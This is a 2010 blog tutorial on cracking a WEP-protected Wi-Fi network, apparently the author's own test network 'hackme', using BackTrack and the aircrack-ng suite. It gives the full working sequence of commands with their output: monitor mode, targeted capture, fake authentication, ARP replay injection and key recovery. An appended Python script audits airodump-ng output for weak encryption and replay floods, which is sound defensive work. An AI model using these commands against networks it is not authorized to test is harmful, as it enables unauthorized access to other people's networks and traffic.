Wireless Hacking - WEP

I'm cleaning up my old blog and transitioning to the new one, so I've decided to update a few posts.

BackTrack 4 just released its final version, so I decided to break in my netbook.

My netbook obviously doesn't have a CD-ROM drive, so I had to put the BackTrack ISO onto a flash drive with UNetbootin.

I have a Hawking HWUG1 USB Wi-Fi card that I'll be using for this tutorial.

First off, we'll start by putting the card into monitor mode:

airmon-ng start wlan0
Interface       Chipset         Driver

wlan0           Ralink 2573 USB rt73usb - [phy6]
                                (monitor mode enabled on mon0)

From now on, we'll be using the interface mon0. Now, let's scan the local wireless networks to see which one we'd like to hack.

airodump-ng mon0

CH  9 ][ BAT: 1 hour 58 mins ][ Elapsed: 20 s ][ 2010-02-07 21:13

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:22:75:13:C0:19   -1        0        2    0 128  -1   OPN
 02:22:3F:95:2B:09  -39       22        0    0   9  54e  WEP  WEP         hackme
 00:22:3F:95:2B:08  -41       23        1    0   9  54e  WPA2 TKIP   PSK  ipson2
 00:23:69:3A:A3:23  -70       15        0    0   1  54e  WPA2 CCMP   PSK  computer
 00:23:69:9D:92:78  -78       12        0    0   6  54   WPA2 CCMP   PSK  sullivans
 00:23:69:87:CA:9A  -78       13        0    0   6  54   WPA2 CCMP   PSK  The Horde
 00:73:07:0D:5E:D9  -81       11        0    0  11  54   WPA  TKIP   PSK  UBTAnet-DSL
 00:1E:E3:EA:3A:F2  -81       10        0    0  11  54   WPA  TKIP   PSK  kmiller

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:22:75:13:C0:19  00:16:6F:37:76:7D  -81    0 - 1     30       30
 00:22:3F:95:2B:08  00:23:69:3D:B1:82   -1   54e- 0      0        1
 00:22:3F:95:2B:08  00:1F:3B:70:06:CD  -47    0 -12e     0        6
 00:23:69:87:CA:9A  00:23:32:55:63:D6  -71    0 -11     31       15  The Horde

We are going to crack the network "hackme". That takes three steps: run airodump-ng again and save what we capture to a file, run a replay attack against the AP so we aren't sitting here all day waiting for packets to come in, and then crack the WEP key. So here we go...

airodump-ng mon0 -c 9 -w wephack --bssid 02:22:3F:95:2B:09

-c specifies the channel the AP is on. -w specifies the filename prefix for the capture (the file shows up later as wephack-01.cap). --bssid specifies the MAC address of the AP. This will give a result similar to what we got earlier, just trimmed down a lot. Go ahead and open a new terminal tab or window, and run the following command:

aireplay-ng -1 1 -a 02:22:3F:95:2B:09 mon0

This performs a fake authentication with the AP. Just make sure that the MAC address after -a is the same one you used in the last step. Let this command run for about 10 seconds or so, then press Ctrl-C to kill it. In the same terminal window, run this command:

aireplay-ng -3 -b 02:22:3F:95:2B:09 mon0

This runs the ARP request replay attack. It will look something like this:

No source MAC (-h) specified. Using the device MAC (00:0E:3B:0A:12:12)
23:33:43  Waiting for beacon frame (BSSID: 02:22:3F:95:2B:09) on channel 9
Saving ARP requests in replay_arp-0207-233343.cap
You should also start airodump-ng to capture replies.
Read 276756 packets (got 74451 ARP requests and 37670 ACKs), sent 43323 packets...(499 pps)
^C

Then in another tab, run aircrack-ng against the capture file being created by airodump-ng:

aircrack-ng -P 2 wephack-01.cap

aircrack-ng runs the attack while airodump-ng is still writing the capture file, restarting as more IVs arrive, so the key is recovered as soon as enough have been collected. Here is the final result:

Opening wephack-01.cap
Read 62107 packets.

   #  BSSID              ESSID                     Encryption

   1  02:22:3F:95:2B:09  hackme                    WEP (224 IVs)

Choosing first network as target.

Opening wephack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 224 ivs.
Failed. Next try with 5000 IVs.
Starting PTW attack with 5011 ivs.
Failed. Next try with 10000 IVs.
Starting PTW attack with 10007 ivs.
Failed. Next try with 15000 IVs.
Starting PTW attack with 15008 ivs.
Failed. Next try with 20000 IVs.
Starting PTW attack with 20052 ivs.
Failed. Next try with 25000 IVs.
Starting PTW attack with 25050 ivs.
Failed. Next try with 30000 IVs.
Starting PTW attack with 30040 ivs.
Failed. Next try with 35000 IVs.
Starting PTW attack with 35007 ivs.
Failed. Next try with 40000 IVs.
Starting PTW attack with 40004 ivs.
Failed. Next try with 45000 IVs.
Starting PTW attack with 45069 ivs.
Failed. Next try with 50000 IVs.
Starting PTW attack with 50039 ivs.
Failed. Next try with 55000 IVs.
Starting PTW attack with 55012 ivs.
Failed. Next try with 60000 IVs.
Starting PTW attack with 60044 ivs.
Failed. Next try with 65000 IVs.
Starting PTW attack with 65004 ivs.
Failed. Next try with 70000 IVs.
Starting PTW attack with 70026 ivs.
                         KEY FOUND! [ 03:1A:B0:3D:F4 ]
        Decrypted correctly: 100%

So how long did this take? Take a look at the airodump-ng window:

 CH  9 ][ Elapsed: 3 mins ][ 2010-02-07 23:35

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:22:3F:95:2B:09  -46   0     1829    75262  744   9  54e  WEP  WEP    OPN  hackme

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 02:22:3F:95:2B:09  00:0E:3B:0A:12:12    0    0 - 1   408245    94088
 02:22:3F:95:2B:09  00:26:08:E9:93:F4  -45   54e-54e     0    44157
 02:22:3F:95:2B:09  00:26:08:E9:93:F4  -45   54e-54e   319    47597

3 minutes! That's how easy WEP cracking is!
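Reading the same airodump-ng tables from the defender's side, as an added example (not the post's code): the script below parses the AP and station rows shown above, flags networks still on WEP or open authentication, and flags the traffic volumes that an ARP replay like the one above leaves behind in the #/s, Lost and Packets columns. The sample rows are taken from the post's tables; the two thresholds and the "Lost + Packets" heuristic are assumptions.

```python
"""Audit airodump-ng output for weak encryption and replay-flood volumes. Added
example, not the post's code; sample rows are the post's, thresholds are assumed."""
import re
MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
ENC_TYPES, WEAK_ENC = {"OPN", "WEP", "WPA", "WPA2"}, {"OPN", "WEP"}
CIPHERS, AUTHS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP"}, {"OPN", "SKA", "PSK", "MGT"}
FLOOD_PPS = 300         # assumed: #/s data frames a home AP should not sustain for minutes
FLOOD_FRAMES = 100_000  # assumed: Lost + Packets for one station within one scan
# Station row: BSSID STATION PWR Rate Lost Packets [Probes]; airodump-ng prints
# Rate as "0 - 1", "54e- 0", "0 -12e" or "54e-54e", hence the loose pattern.
STATION_RE = re.compile(
    rf"^\s*({MAC})\s+({MAC})\s+-?\d+\s+\d+e?\s*-\s*\d+e?\s+(\d+)\s+(\d+)")
# Constructed sample: the AP header, the post's final hackme row and its two station rows.
SCAN = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:22:3F:95:2B:09  -46   0     1829    75262  744   9  54e  WEP  WEP    OPN  hackme
 02:22:3F:95:2B:09  00:0E:3B:0A:12:12    0    0 - 1   408245    94088
 02:22:3F:95:2B:09  00:26:08:E9:93:F4  -45   54e-54e   319    47597
"""

def parse_ap(line):
    """Return (bssid, essid, enc, data_per_sec) for an AP row, else None."""
    tok = line.split()
    enc_idx = next((i for i, t in enumerate(tok) if t in ENC_TYPES), -1)
    if enc_idx < 7 or not re.fullmatch(MAC, tok[0]):  # PWR [RXQ] Beacons #Data #/s CH MB precede ENC
        return None
    rest = tok[enc_idx + 1:]
    for column in (CIPHERS, AUTHS):     # CIPHER and AUTH may each be blank
        if rest and rest[0] in column:
            rest = rest[1:]
    # "#/s" sits three columns before ENC whether or not RXQ is printed.
    return tok[0].upper(), " ".join(rest), tok[enc_idx], int(tok[enc_idx - 3])

def audit(text):
    """Report weak APs plus APs and stations whose volumes match injected replays."""
    report = {"weak_aps": [], "flood_aps": [], "flood_stations": []}
    for line in text.splitlines():
        ap = parse_ap(line)
        if ap:
            bssid, essid, enc, pps = ap
            if enc in WEAK_ENC:
                report["weak_aps"].append((bssid, essid, enc))
            if pps >= FLOOD_PPS:
                report["flood_aps"].append((bssid, pps))
            continue
        m = STATION_RE.match(line)  # Lost = sequence-number gaps, Packets = frames seen
        if m and int(m.group(3)) + int(m.group(4)) >= FLOOD_FRAMES:
            report["flood_stations"].append((m.group(2).upper(), int(m.group(3)), int(m.group(4))))
    return report
```

The flagged station in the sample is the card that was injecting in the post, whose Lost column alone exceeds every other station's Packets count.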
© 2010 Joe Ipson.